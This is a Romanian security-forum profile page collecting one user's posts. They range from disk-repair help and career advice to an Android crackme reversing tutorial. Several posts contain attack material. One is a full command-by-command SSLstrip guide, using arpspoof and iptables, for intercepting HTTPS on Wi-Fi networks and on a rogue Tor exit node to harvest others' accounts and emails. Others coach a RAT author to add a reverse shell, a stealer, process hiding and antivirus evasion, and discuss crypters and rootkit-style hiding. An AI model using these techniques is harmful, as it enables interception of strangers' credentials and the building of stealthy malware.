Jump to content

me.mello

Active Members
 View Profile  See their activity

  • Posts

    571

  • Joined

  • Last visited

  • Days Won

    4

 Content Type 

Everything posted by me.mello

  1. me.mello
    Numai fa 10 threaduri pentru niste templane-uri....fa unul si punele pe toate.
  2. me.mello
    mai e numit si polimorph....cat pupincurism...habar nu aveti zau.
  3. me.mello
    trece-ma si pe mine pe lista .Net...stiu mai multe dar vreau sa ma implic si eu. Multumesc frumos.
  4. me.mello
    Ok, din cate am inteles ai dat format la D insa nu a avut timp sa formateze....Recunosc problema....Nu mai ai ce sa ii faci...ai cam pierdut datele din d...iar partitia E nu o mai vezi:| Incearca sa intri in disk management: Accessing Disk Management There are a few different ways to access Disk Management. Method 1 - Start > Control Panel > Performance and Maintenance > Administrative Tools. Double click Computer Management and then click Disk Management in the left hand column. Method 2 - By default, Administrative Tools is not shown on the Start Menu but if you have modified the Start Menu (by right clicking the Start button and selecting Properties > Customize) so it is shown then just select Start > Administrative Tools > Computer Management and then click Disk Management in the left hand column. This is the easiest! Method 3 - Click Start > Run and type diskmgmt.msc in the Open: line and click OK. The Disk Management snap-in will open. Acolo vei vedea toate partitille fie ca sunt ascunse din registri, neformatate sau neacesibila datorite unei erori. Daca vezi D dai click dreapta pe el si dai format...daca vezi si E pe acolo dai click dreapta si dai explore...ar trebui ca explorer sa te bage in partitie(doar de acolo dat fiind de ce nu iti apare in my computer)...daca da...iti sugerez sa faci un backup...in D daca tot va fi gol;)) si sai ii dai format si la E...pe urma sunt mari sanse sa iti apara ambele dupa un reboot. Edit: De asemenea poti incerca ceva mai serios si anume Paragon Partition Manager...numele spune tot. poti face cam orice cu HDD-u inafara de recuperarea datelor...pentru asta sunt alte chestii da nu cred ca ai nevoie din moment ce iti spun ca o sa dureze si saptamani.. Off: nu va inteleg de ce folositi toate prostiile din moment ce windows iti ofera absolut orice...asa in general.
  5. me.mello

    geoRAT 3.0

    me.mello replied to gigaevil's topic in Programare

    nu inteleg faza "metamorfic"....ma rog Daca ai vrut sa te referi la polymorphic in nici un caz nu e....in primul rand ai stub....in al 2-lea rand ai junk code....e o metoda murdara de a face bypass..vorbeam cu oust si ma radeam:)) sunt cam mari librariile 400 kb pt un keylog care daca il pui direct in server are max 10 kb? cand mai mult de maxim 5 functii API nu invoci? atat cod junk ai bagat?...doar pt av? Optiuni care ar trebui si iti recomand sa incerci sa le implementezi: 1:Reverse Connect....se poate face in nenumarate feluri....PHP 2:Clients: tot cu PHP implementare in server...cand este conectat severu sa scrie in PHP ceva ce e citit de catre client 3:Reverse Shell 4:Scoate alea de fun ca pare chestii copilaresti de virgin excitati(doar aia l-ar folosi) Stim cu totii ca FindWindow e functie API si WS_Hide face parte tot din win32 API. suntem un forum de securitate cat se pate de serios...chiar daca mai facem caterinca si injuram. 5:Incearca ce tiam scris mai devreme...stealer 6:Anumite functii esentiale sa le tii in server sa numai faci pluginuri...ca oricum sunt cam mari...degeaba au JunkCode Serverul e cel care trebuie sa traiasca. 7: incearca sa implementezi server.exe ca server, si incearca sa il ascuzi din task manager 8: Incearca sa implementezi ACL/DACL...putina protectie contra AV, de asemenea si protectie a procesului...sa nu fie luat in carca de olly 9: Cel mai important...incearca sa il faci polymorphic fara stub...nu cred ca e asa complicat 10:///removed Cu toate astea nu lasa lumea rea sa zica...ca oricum aici se gasesc guri rele la orice faci si ei nu pot. Inca o data, Felicitari
  6. me.mello

    geoRAT 3.0

    me.mello replied to gigaevil's topic in Programare

    Foarte elegant, destul de multe functii...acele librarii foarte bun pentru "prostime" .Stie oust despre ce e vorba AntiExecutable Desi pe unii nu ne intereseaza cat de elegant e Clientul, Daca serverul e creat fara stub..//removed Cat despre metodele tale de a trece de sistemele de securitate ale prin metoda junk or dirty code(din cate am inteles) e buna...insa in marea majoritate a cazurilor mareste cu mult serverul uneori. Cat despre pluginuri...sunt cam maricele pentru atat de putine functii insa asta imi aduce aminte de Yuri Rat...unde poti face upload la pluginuri, dupa care sa le accesezi. Deoarece ai numit aceasta aplicatie Remote Admin tool nu o sa ma bag mai departe...insa l-ai putea transforma cu usurinta si sau daca nu in stealer, din cate am observat le mananci bine....sugerez sa te uiti prin ultimele mele threaduri...vei avea o idee de pornire. Daca vrei mai multe informatii...desi nu cred ca ai nevoie ma poti contacta oricand. Cu toate astea, Buna treaba...ma bucur ca cineva pe RST ia treaba in serios. Sper daca imi permite timpul sa ma laud si eu cu un RAT cat de curand;)
  7. me.mello
    Eu as zice RAID, RAID pana ne bagam toti,are dreptate noi suntem viitorul, si suntem in acelasi cacat cu moldovenii ce dreq, is mai amarati aia sa inceapa ceva sau ce?. Cine e dispus sa faca un topic, m-am saturat de discutii lacrimogen despre ce a facut ala....daca isi dadea foc tot cacatu ala il discutati. Asa ca As zice FAPTE NU VORBE.
  8. me.mello
    Nytro, imi place cum ai abordat subiectul, foarte elegant unii chiar inteleg ceva...pana si eu, insa in Romania asa este, desigur in afara e cu totul altceva, o sa precizez mai incolo de ce, ei te intreaba verde in fata cam cat salariu ai merita tu...ei bine intrebarea asta e un pic mai dificila deoarece daca spui un salariu mare sau mai mic e nasol...daca vrei sa tintesti undeva in firma "x" sa zicem, asta facand referire la abordarea unei firme...sa zicem web developer in firma "x" e bine sa te interesezi si cam ce salariu s-ar oferi...de obicei e o intrebare capcana chiar si la noi in tara, ok acum cat e despre experienta...de obicei cand iesi din facultate mai ales din economie...de obicei aici e mai "greut" ei iti vor cere experienta....sau mai bine zis munca....ei bine nu le poti spune ca ai mai muncit altundeva insa le poti arata ce proiecte ai facut tu prin facultate...daca ai arso cu bere la metru 3 ani de facultate...nu spera la prea multe daca mama si tata nu pot "cotiza" catre un loc de munca mai bun...deci e bine ca oriunde sa aplici la cate un proiect...sa il ai acolo la CV. Acum sa revenim la exemplul nostru web developer....majoritatea mai ales la noi in tara se cere php mysql...cam si ce faceti voi majoritatea pentru ca aici fac referire la un forum de securitate...nu e mare lucru....dar una e sa faci ce ti se cere si alta e sa gasesti tu xss, sqli insa mai vine si panica sau trac...cum vreti voi sa-i spuneti....nu sperati ca or sa va puna la mare lucru e posibil ca la un job sa vi se ceara mai putin decat stiti voi...insa nici la asta sa nu sperati...trebuie sa fiti optimisti...nu sa traiti cu speranta ca o sa am un job usor...NU veti fi singuri, acum sa trecem la capitolul experienta....daca nu cumva esti un guru al php-ului sa nu-ti fie teama de nimic, si sa ii zici verde in fata uite asta pot si stiu sa fac, e bine sa ai un portofoliu cu tot ce ai facut si e "live" astazi sa le poti demonstra ca tu intradevar stii si ca poti mai multe...si dc zic asta. Acum cateva saptamani, undeva pe la sfarsitul lui iunie am avut nevoie de cineva sa imi faca un site php full cu tot ce aveam nevoie, ei bine ca de obicei si in majoritatea cazurilor am apelat la cineva cunoscut mai intai sa cer ajutor unei firme sau altcineva nu atat de cunoscut, ei bine am apelat la un frate al unui amic....cand i-am explicat situatia si ce anume vreau eu, aici trebuie sa adaug ca din facut site-uri isi castiga existenta...are firma dar a inceput ca game tester la ubisoft...dar sa lasam asta, cand iam spus pe detaliat ce anume vreau sa fac...pur si simplu am simtit in telefon cum acea persoana si-a dat seama ca nu e ceva ce vine de oriunde si...cred eu s-a panicat si a inceput sa ma ia cu ce are el in portofoliu si ce a facut el in trecut pentru diferite firme...etc probabil vroia sa ma impresioneze cu ceva, iar eu fiind o persoana care in domeniu care se afla stie exact ce sa iti ceara si asta cat mai direct chiar daca unii se tem de scala uneori fiind prea mare....am trecut si eu prin asta....probabil veti trece si voi daca nu cumva unii dintre voi chiar ati trecut prin aceasta situatie....e un lucru bun de invatat...uneori sunt foarte multi bani in mijloc...dar totul se rezuma la responsabilitate...nu trebuie sa va fie teama de ea...e o lume digitala si o poti invarti cum vrei tu, chiar daca nu doar tu esti in ea,e a ta..si doar a ta!! Trebuie sa recunosc, am avut unele probleme la securitate insa s-a rezolvat cu putin ajutor din afara, omu mi-a facut treaba l-am platit, sunt multumit avand in vedere situatia in care ma aflu...si anume nu stiu o buchie de php iar la varsta mea nici timpul nu imi permite sa invat, consider ca stiu asp .net cat sa fac un website mai bun decat ce mi-a facut individul in cauza...pana la urma ce e facut de tine consideri ca e facut mai bine, si in plus de asta daca e sa o iau pe varianta web developer in .net asta mi-a adus mie banu si nu php, pur si simplu sunt prea multe motive sa las multe lucruri balta si sa incep sa fac programare in php din moment ce stiu si sunt bagat cu totol si cu totul in altceva, e inca un lucru care e bine sa il tineti minte, spre exemplu pentru mine doar sa invat php pentru mine, ca bani din asta nu cred ca voi scoate sa ma multumeasca, asa ca daca stiti si ati inceput cu ceva....sa o tineti pana la capat, sigur si va vor spune mai multi ca se vor gasi si pentru voi un loc de munca atat timp cat prestezi acum cat esti in "putere". De obicei dilema asta daca ii poti spune asa o intalnesti des cu persoanele Linux/Windows sa nu credeti ca atunci cand vine vorba de bani Linux e mai bun ca Windows...dar in general persoanele Linux sunt cel mai probabile sa gaseseasca n subiecte de ce nu trec ei la Win...si probabil vor munci sau daca nu vor incerca sa gaseasca un job pe platforma asta. Deci prestati, in domeniul cu care v-ati obisnuit, nu va bagati pe altceva daca nu aveti o impresie buna la inceput, eu nu am invatat...sau cel putin nu mi-a intrat in minte absolut nimic din ce nu a parut interesant si cat mai apropiat de ce stiu....bineinteles cu timpul o sa invatati din mers si o sa va schimbati parerea asta daca cumva o aveti si voi...insa acum la varsta asta unii dintre voi chiar cred ca mai aveti mult de asimilat...sau nu. APROPO pentru membrii RST: Acum pe la inceputul verii, am avut de gand prin cineva sa incep ceva foarte mare in tara....nu e absolut nici un fel de minciuna....chiar am vorbit cu cineva si i-am explicat...pe urma am observat ca e elev de liceu si are multe planuri in cap...nu o sa zic despre cine e vorba....sper sa i se indeplineasca, e o persoana chiar foarte talentata si tuturor nea demonstrat lucrul asta... E posibil cat de curand....sau niciodata...depinde cum vor evolua lucrurile(am observat ca Nytro incearca sa va duca spre o lume unde nu tot ce zboara se mananca....aici facand referire la acest topic...despre studenti in domeniul IT care doresc un job in domeniu) sa am nevoie de anumite persoane de aici, totul se intampla in tara... nu vreau ajutor din afara. Daca e asa va voi contacta prin PM sau topic asta depinde cand se va intampla, deja am intrebat unele persoane dupa forum cu care m-am imprietenit si sunt foarte de treaba despre anumite persoane si cred ca pe o anumita platforma o sa am nevoie de anumite persoane care nu au ce face sau cred ca ceea ce fac le aduc prea putin....ca si in afara daca lucrurile decurg bine, voi avea grija personal sa fiti certificati in domeniu afara si nu zic mai multe, ca si in cazul persoanei cu care am vorbit veti avea timp de scoala + multe altele...acest job daca veti avea parte de el va vi cu totul diferit de ceea ce se ofera prin tara la anumite firme, mai pe scurt vor fi conditii ca "afara" daca putem sa-i spunem asa. Ca sa revin la subiect, ca am facut mult Off-Topic o sa il ajut pe Nytro un pic. Vam precizat mai sus, Conteaza foarte mult ce sa raspunzi la interviu..majoritatea angajatorilor stiu exact ce se face pe la facultati...deci puteti sa ii impresinati si cu un portofoliu de preferinta cat mai bogat, sa vorbesti civilizat desigur sa nu pari ca esti de la usa cortului cu un email de tzaran:)) +rep, acum cat sunteti "fresh" incercati sa va tineti de treaba care va place cel mai mult....daca faceti php care e cel mai popular nu are rost sa va ganditi sa incepeti .net fie el asp silverlight c# vb...etc nu isi au rostul, e pierdere de timp. Cum nu le am cu php nu pot sa va recomand ceva in domeniu, insa daca aveti dubii in ceea ce priveste..."Oare detin atat de multe informatii cat sa pot lucra la o firma? sau sa lucrez in general" ei bine aceasta intrebare nu aveti de ce sa v-o puneti si ca sa v-a dau un raspuns cat mai concret nu pot decat sa va recomand 2 lucruri care mie mi-au schimbat viata in bine si sigur, chiar mai mult ca sigur daca va tineti de treaba si voua. 1: PrepLogic CompTIA A+ Certification, CCNA Training, MCITP and MCSE Training & More Ai dubii in ceea ce priveste cunostintele tale? descarca un examen free si dal...vezi ce punctaj faci...nu iti recomand sa il faci de 2 sau mai multe ori(daca vrei sa iti testezi cunostintele) pentru ca e acelasi si cu siguranta vei avea un punctaj mai mare a 2-a oara, insa va recomand sa il dati de cate ori se poate...si la sfarsit de test dai la sumariu si vezi ce ai gresit la intrebarile care chiar nu stii sa raspunzi...dai la raspuns si afla raspunsul...acela e raspunsul corect...de obicei primesti si o definitie exacta si spun asta ca sigur se vor gasi intrebari care nu le gasiti raspunsul. In plus de asta ai partenerul google care te va mai ajuta. 2: TopCoder TopCoder, Inc. | Home of the world's largest development community Imi amintesc cand am venit prima data pe forum am ajuns sa ma cert si sa ma contrazic cu Nytro(apropo imi cer scuze din nou) el imi zicea ce am facut eu in trecut...mereu ii raspundeam ca nu am nimic sa-i dovedesc si ii spuneam de TopCoder:)) Ei bine aici am crescut, dar sa revenim. Ai sau crezi ca ai cunostinte de le dai pe afara? Dovedeste ce stii. Dar nu dovedi pe un forum, dovedeste acolo...De peste tot in lume, programatori in general freelanceri se regasesc pe TopCoder la cate o competitie....Sa va zic pe scurt...celor care nu au auzit....TopCoder asa cum ii spune si numele faci competitii care e cel mai bun, Insa nu chiar asa stau lucrurile TopCoder e o platforma java, seamana cu o arena....unde ai mai multe categorii, pentru inceput alegetiva o problema usoara...si selectati minimum de puncte....daca rezolvati problema veti primi punctele...o sa vedweti ca puteti face chalenge cu altcineva...puteti vedea cum persoana cu cel mai mare punctaj la acea problema a rezolvato si asta facand referire la programare, fiecare problema o poti rezolva in diferite limbi de programare...totul tine sa selectezi limba si sa scrii codul...si sa il verifici si apoi sa il trimiti catre compiler....poti programa in visual basic c# c++ java python....depinde cate limbi iti poate oferi problema...ma refer la cate iti dau ei...dar in cele mai dese cazuri ai python java c++ c# sau visual basic....acolo nu ai cum sa gresesti, nu ai cum as trimiti un cod gresit...daca e gresit nu ai cum sa il trimiti...va recomand sa nu copiati de la altii cod, TopCoder nu prea accepta asa ceva, va veti da seama inainte de orice problema puteti sa alegeti un numar de puncte...cu cat e mai mare cu atat si problema va fi mai grea....veti vedea ca daca ati facut bine...si ati primit sa zicem 500 de puncte pentru acea problema veti aparea undeva la sfarsitul clasamentului la acea problema...si altii vor avea cu miile de puncte ceea ce vi se pare imposibil....ei bine acela e challenge veti vedea in timp. Ca programator freelancer....poti face multi bani din TopCoder...deoarece se intampla multe...firmele apeleaza la acest site...chiar si nasa a facut o competitie cu multi bani la mijloc...veti primi email cu cele mai noi competitii, daca va simtiti in stare desi nu sunteti acomodati cu peisajul va recomand sa va bagati, nu aveti nimic de pierdut, insa daca veti selecta un anumit numar de puncte, iar codul vostru e corect dar nu valoreaza acel numar de puncte veti primi mai putine, aveti si sansa de a vacorecta codul pentru un numar mai mare de puncte insa daca ati gresit mai rau a 2-a oara e cam in zadar si va recomand sa incepeti alta problema.Vor fi competitii pentru design, programare si altele...firmele apeleaza la TopCoder pentru anumite programe...vi se dau exact toate detaliile de care aveti nevoie impreuna cu o problema...vi se dau parametrii unei functii variabile si tot ce aveti nevoie...voi doar sa programati. Daca le aveti cat de cat, si va bagati, int-un an pe TopCoder veti realiza diferenta de a invata din tutoriale/forumuri si a practica live si in plus de asta iti vei face multi prieteni/relatii poate castigati vreo competitie....chiar si cea mai mica competitie posibila castigata iti poate aduce 500$ in buzunarel, plus foarte foarte multe altele. Asa cum am spus competitiile, nu problemele le veti primi prin email, eu zic sa fiti pe faza , sa cititi cu atentie ce se cere si sa va inscrieti...cu cat sunteti mai rapizi cu atat e mai bine, veti vedea si de ce anume, sa nu va treziti ca si mine in nenumarate cazuri in care nu mi-am citit mailu sa il citesc pe urma si sa aflu ca problema era chiar usoara si as fi putut sa o rezolv...sau nu. Eu va urez succes in viata, si sa alegeti ce considerati ca e mai bine, insa sa nu va bagati unde nu va fierbe oala, cateodata e mai bine sa te gandesti de 2 ori inainte de a face un pas.
  9. me.mello
    Tuts 4 you http://tuts4you.com grozav site...ai ce invata de aici...intodeauna a fost un bun start, iar oamenii care au invatat ceva s-au intors si acum ajuta pe altii la randul lor, spre deosebire de alte site-uri copy-paste, Reverseri cunoscuti s-au calit pe tuts4you:) Recomand tuturor.
  10. me.mello
    Queensland...orice perioada din an, ai toata increderea;) asta daca nu iti e frica sa te ineci printre coralii in apa de 2 metri pe o raza de 20 km:))
  11. me.mello
    ma intreb daca pot sa implementez in xss tunell ceva de aici:)
  12. me.mello
    no shit!! ia uitete la asta http://rstcenter.com/forum/35321-dot-anything-take-over-internet-expert.rst
  13. me.mello
    @gixman stai chill man nu am zis cu rautate, stiam ca o sa se duca de rapa crypterul, dar credema ca si eu am facut atatea in ASM, acum le fac si eu in VB ca se fac foarte foarte simplu. Ce vroiam sa zic este ca nu trebuia sa cryptezi parola in toate cacaturile cum a facut ala, ba mai mult tu ai facut cam acelasi lucru insa ai cryptat altfel:) Faza e ca oricum s-a dus de rapa, insa omul le updateaza mereu, chiar daca nu o sa mai faca public sau sa vanda source, asadar ma gandeam sa il dai fara parola cryptata, ca daca ai citit mai sus, cine are nevoie n-o sa il futa... Concluzia: Cryptere apar zilnic, trebuie sa stii unde sa bati, si e frumos sa dai free, lasa oamenii care zic ca "ce bine ca ai pus aprola cryptata, asa no sa se futa crypteru" dupa parerea mea e gresit asa ceva....mai ales aici pe forum:) Sper ca nu te-ai suparat, nu am avut intentia sa te jignesc cumva.
  14. me.mello
    eeeee, floricele cu cascavaaaal;)) +1 Edit: base64(x2)->>hex (x2)->>base64 Incearca cu crypto.com next time Mai degraba encriptezi username si codul...decat link, e usor sa scrii pe google titlul topicului.
  15. me.mello
    Il suflati in popnet degeaba, vroiam sa pun eu parola sau alt link dar nu vreau sa-i stric imaginea autorului original L3G!T™ a zis ca numai face daca este facut public sau, mie unu nu imi pasa, este facut in vb .net si pana si un copil cu cel putin 1 an de experienta visual basic poate sa se apuce de facut cryptere, insa ma amuza faptul ca tu te-ai luat dupa toti care au criptat arhiva ca autorul original in n cryptere(iti zic eu unu care a auzid si stie ce inseamna FUD e o mare probabilitate sa fi auzit si de Matt Blaze / crypto.com), puteai sa nu faci lucrul asta. Articolul original L3G!T™ on hackforums: Hack Forums Stub archive : WgYJ7OPTk04H/16/DgDovHhr402NZHBE=+BWZRcGDf67W4h9D0Bs6l48k4I1ITNkgYJDGD94GSG64fTBG5Iwytt4IW3B+BWC?lcG7zZsC8hjv3Ys6dWMDfVIcISSkezk7dz84GTj6Hf8B3WI4fhTWfWI6GtfB+YGCkHb=gz7C8hTWINl1?dZfklfR=ytn Encrypted -->REVERSER>ZONG22(x 2)>REVERSER >T-ASCII>TIGO-3FX(x 3) Nu putea lipsi un ratat de la hackcomunity.com(satz333>>leecher de cacat a fost banat in aceeasi zi) sa posteze si el crypteru dupa o zi dupa ce a fost postat pe hackforums: L3G!T Din fericire ratatul a fost banat, Dar acum numai e FUD incearca sa numai dai copy->paste fara sens, Oricum autorul se tine de treaba si updateaza zilnic crypteru', sa speram ca numai vinde sursa pe maruntis. Iar pentru voi restul, Tigo-3fX Armon-64 HAZZ-15(x2) ZONG22 Data viitoare numai fa pe desteptul sa faci ce face si altul,ca o sa se trezeasca un nebun ca mine sa te faca de rusine, daca tot dai copy->paste de la un user banat L3G!T sau chiar fie si de la autorul original Hack Forums Posteaza linku original, ba chiar fara parola, daca ai fi citit bine omu zice ca le face update zilnic la link....si originalitatea ta se duce de rapa:)) PS: Cryptere apar zilnic, nu ma judecati pentru ca ii spun omului sa face ceva corect, desi e facut in vb totusi e destul de complex si asa, si sa nu imi spui ca nu inteleg ca nu ar trebui facute publice pe mana oricui, dar aici pe forum sunt mai mult ca sigur ca sunt persoane care au ce face cu un crypter si au nevoie, si mai sunt persoanele care stiu cu ce se mananca un crypter si fac upload pe virustotal din proprie initiativa doar sa faca rau....acum spunetimi acele persoane nu stiu sa decodeze tirgo-3fx?? cand omu zice exact pasii de encodare? Cat despre mamaligari...aia habar nu au ce e un crypter, si nu prea stiu ce sa caute, si nu prea au ce sa caute pe acest forum:)
  16. me.mello
    Author: Juan J. Fernandez Secure Socket Layer is not secured as we might think. At least, throughout http and https. Vulnerabilities are presented through the exchange of data across http ? https and http ? https . These are exploited using https stripping attacks, transparently hijacking http traffic on a network, watching for https links and redirects to map those links into look-alike http links. SSLSTRIP tool do just exactly that and can be deployed through man in the middle attack on a wireless network using iptables, arpspoof. It can also be deployed on the Tor Network if you configure your computer as a relay exit node in port 80. REQUIREMENT I assume you are using a GNU/LINUX OS or Mac OSX SSLSTRIP: main tool for our stripping attack IPTABLE : to match our target traffic and redirect it to sslstrip ARPSPOOF: used in wireless network to make our computer look like router Tor as relay: to apply the concept once we enter another network Wireless https striping attack As root, type in the terminal: echo “1” > /proc/sus/net/ipv4/ip_forward and arpspoof -i <interface Ex: wlan0> <langatewayip ex: 192.168.1.1> . This will let or authorize your linux box to forward the packet and perform and arp injection to let every computer knows that your mac adress is the mac adress of the router, those forwarding all those packets to you. Now, open up another terminal as root and type iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 This will set the filtering rule(firewall) as “alter packets as soon as they come destinated to port 80 redirecting them to port 8080” Now, on the same terminal as root, type sslstrip -l 8080 -w sslstrip.log and on another terminal type tail -f sslstrip.log . At this point, sslstrip will do the job and neither the server nor the client knows that you are hijacking http and watching for https links to redirect and map those links into similar http links or homograph-similar https links. The tail command is to watch the log file as it increases. Tor network https stripping attack A wireless network is like any other network. Why not apply that to another network like Tor Network ? It just requires minor modification to iptable command and the elimination of arpspoof use and of course, set up Tor as relay. Set up Tor relay Tor is a network of relay, when a user uses tor, he or she pass along about three computers(relays) before they get to the final destination. I will show you how to be the exit node(last relay) We will be creating another account to apply the redirection for that uid (user id and not us) that will prevent the disconnection... Open up a terminal as root and type useradd toruser -u 111 -m and passwd toruser (use the password you like). Then logout from your account and login to toruser. Install Tor Tor: Linux/BSD/Unix Install Instructions For the purpose of this presentation, download the Tor Browser Bundle for GNU/Linux on Download Tor extract it tar xvfz file.tar.gz and cd to filedirectory run vidalia in filedirectory/App. Once it start running click setup relay and configure exit node to port 80 only. Make sure your router forward port 80, 9051, 9001 and 9030 to your local ip if you are behind the router's firewall. Once you test it and verify that it is reacheble form the outside by running it again, logout from toruser account and login back to your original account. Now the fun part starts... Sniff out that Tor network !!! Open a terminal and type su toruser and type the assined password.This is an important step to run the relay: Cd to tor-browser_en-US (in my case) file directory inside toruser account and run tor ./App/tor -f /home/toruser/tor-browser_en-US/Data/Tor/torrc Now that everything is running, reachable from outside, open up another terminal and as root type: iptables -t nat -I OUTPUT -p tcp -m owner --uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080 Everything that comes from toruser will be redirected to localport 8080. DNAT means that match if the original destination differs from the reply source. This make sense when the OUTPUT match.(these are iptables details that worth to know to see what is really happening...) Now type sslstrip -l 8080 -w logfile and on another terminal to watch the file as it grows, tail -f logfile . Let it run couple of hours and days and you will see accounts, md5 hash, email messages, hosting accounts and more. Next page is just a small part of what I recollected from Tor Network. References ? DEFCON 17 ? SSLSTRIP Moxie Marlinspike >> software >> sslstrip ? Tor Tor: Documentation ? IPTABLES iptables(8) - Linux man page Have fun reading ><
  17. me.mello
    German DDoSer jailed for World Cup gambling extortion Frankfurter menaced bookies with rented bots By John Leyden Posted in Crime, 17th June 2011 15:38 GMT A hacker based in Germany has been jailed for 34 months over a DDoS-based extortion scam against gambling websites in the run-up to last year's World Cup. The unnamed Frankfurt resident was also ordered to pay damages of 350,000 Euros ($504,000) by a Düsseldorf court following his conviction for attempting to run a protection racket against six online betting sites. None of the affected sites have been named. The miscreant reportedly hired a botnet at a cost of just $65 before threatening to blast target sites with junk traffic during the World Cup unless they paid him 2,500 Euros ($3,700). Three targeted sites paid a combined total of 5,000 euros, while the other three sites refused to play ball, Deutsche Welle reports. Click here for more info German court convicts man of online extortion | Science & Technology | Deutsche Welle | 15.06.2011 Details of the case, decided in March, were first published this week. The case is one of the first of its type to be considered by the German courts. An earlier prosecution, involving a politically motivated denial of service attack against German airline Lufthansa back in 2001, failed to result in a conviction. That case was brought against two non-profit organisations, who objected to Lufthansa's participation in the deportation of people seeking asylum in Germany. Considered by the courts back in 2005, the case failed essentially because the DDoSs had a purely political motive and were considered to be a non-criminal form of "civil disobedience". ® Oare sunt singurul care crede ca 34 luni e cam putin??
  18. me.mello
    Da din pacate asa este...dar e printre primele versiuni (prin 2008), nu am mai adaugat protectie. Am si zis...am versiune care trece de orice...asta practic se folosteste de un driver kernel...iar softul de o detecteaza el practic detecteaza serviciul(driver service) ascuns care tine adresa procesului, daca as sterge aceasta functie de stocare in serviciu nu ai mai putea recupera procesul el ar sta ascuns pana la restart. Iar acest driver service e folositor la anuntul clasei(init() care practic face anuntul serviciului) deci e inca o problema...la versiunile noi nu ma folosesc de aceasta. Cam asta face Comodo, el practic are grija de serviciu, nu are cum un programel sa imi citeasca ce fac eu cu procesoru'...e bypass kernel, doar eu stiu a face ceva anti-ascuns pentru mine. Nustiu daca ma intelegi.Insa e nasol chiar nu am stiut ....oricum sa fim seriosi @staticwater cati stiu de Comodo, majoritatea folosesc procexp sau taskmgr. Si daca ar fi sa fac ceva intradevar ascuns nu cred ca m-as folosi de o sursa antica de prin 2008;))
  19. me.mello
    Author: Dhanesh Setting up the Ground Well, it seems people are getting crazy about Android platform(everyone is trying to buy an Android phone!). I don't have an Android cell phone but, lets see if I can get my hands dirty with this Linux+java clean room engineered platform. To begin our journey we need Android SDK, a target to test with and the necessary tools. You can download the necessary file from these locations: Android SDK: Android SDK | Android Developers Deurus Android crackme 03: http://crackmes.de/users/deurus/android_crackme03/ Smali and baksmali: smali - An assembler/disassembler for Android's dex format - Google Project Hosting Dex2jar: dex2jar - A tool for converting Android's .dex format to Java's .class format - Google Project Hosting Java decompiler: JD | Java Decompiler Download and install Android SDK, SDK platform(latest is 2.2 at the time of writing), necessary Java packages and rest of the tools. Create a virtual device from SDK menu and start emulation. Within few minutes you can see the emulator booting up and showing the phone screen. Well, thats it! we have our emulator up and running. Getting Started with the Game Now we need to install the software(crackme, its legal!) to the emulator. For that you may have to get acquainted with Android debug bridge(adb)Android Debug Bridge | Android Developers. Installing a apk Error file is pretty simple, all you have to do is to run two commands from Android SDK directory/tools. After the installation you can see the crackme icon from application menu Now run the crackme by clicking on it. If everything went as expected you will see the crackme application on the screen. Now we will play with it, pressing check button with no inputs pops a message 'Min 4 chars', and with a proper name it pops up 'Bad boy'. We have to remember these strings because we will be using them as our search keys when we disassemble the apk(actually dex) files. Also note that we have two hardware ids and we need to find out what those exactly means. Real Android Reversing As our crackme is up and running in emulator, we now move onto reversing it. If you have read apk file format, you can visualize it as a extended JAR file which essentially is a zip file. Now you can change the crackme file name from Crackme03.apk to Crackme03.zip and decompress it to any folder. Now the interesting file for us is classes.dex, which contains the compiled vm codes. We are going to disassemble the dex file with baksmalismali - An assembler/disassembler for Android's dex format - Google Project Hosting. Commands are pretty simple as you can see from screen shots. If everything worked fine, we will have a folder structure similar to Java packages. Interesting .smali files are located at '\com\example\helloandroid'. Open all the .smali files into your favorite text editor(I use Notepad++). If you have never done anything related to reverse engineering/esoteric programming/assembly(IL) programming, you will probably think: WTF!. Relax. We have just opened a disassembled dex file. Now, if you are thinking how on earth someone can find the correct location of checking function, I hope you remember those pop up strings I told earlier. Yeah, 'Min 4 chars' and 'Bad boy'. Now we will use those strings as our search keys. Searching Min 4 chars in all the opened .smali files, we will find a hit in HelloAndroid$2.smali line 130. Our aim is to understand the serial checking function and write a keygen for it. For that we have to know all the dalvik opcodes that are used here. You can visit this page Dalvik opcodes to understand the opcodes and after that you can convert disassembled code to much higher language constructs. I will provide a brief code snippet which actually implements the algorithm. Two hardware ids used are IMEI and sim serial number. 01 //Read name from text box 02 const v23, 0x7f050004 03 invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View; 04 move-result-object v9 05 06 //Read serial from text box 07 const v23, 0x7f050006 08 invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View; 09 move-result-object v21 10 11 //Checking whether the name is of length greate than 4 12 const/16 v22, 0x4 13 move v0, v11 14 move/from16 v1, v22 15 if-ge v0, v1, :cond_51 16 17 //Popup showing Min 4 chars 18 const-string v23, "Min 4 chars" 19 const/16 v24, 0x1 20 .line 86 21 invoke-static/range {v22 .. v24}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast; 22 move-result-object v13 23 .line 88 24 .local v13, notificacionToast:Landroid/widget/Toast; 25 invoke-virtual {v13}, Landroid/widget/Toast;->show()V 26 27 //There is a little exception trick to make integer string from username 28 //It converts aaaa to 97979797 which is ascii equivalent 29 invoke-virtual {v10, v5}, Ljava/lang/String;->charAt(I)C 30 move-result v3 31 32 //Getting first 5 chars from ascii converted name 33 const/16 v22, 0x0 34 const/16 v23, 0x5 35 move-object v0, v12 36 move/from16 v1, v22 37 move/from16 v2, v23 38 invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String; 39 40 //Converting it into integer abd xoring with 0x6B016 - Serial part 1 41 invoke-static {v12}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 42 move-result v22 43 const v23, 0x6b016 44 xor-int v22, v22, v23 45 46 //Getting IMEI from TelephonyManager 47 //http://developer.Android.com/reference/Android/telephony/TelephonyManager.html 48 invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String; 49 move-result-object v6 50 .line 102 51 .local v6, imei2:Ljava/lang/String; 52 53 //Getting sim serial 54 invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getSimSerialNumber()Ljava/lang/String; 55 move-result-object v16 56 .line 103 57 .local v16, simsn:Ljava/lang/String; 58 59 //Getting first 6 chars from IMEI, and similarly from sim serial (IMEI.Substring(0,6) will be used as Serial part 3) 60 const/16 v22, 0x0 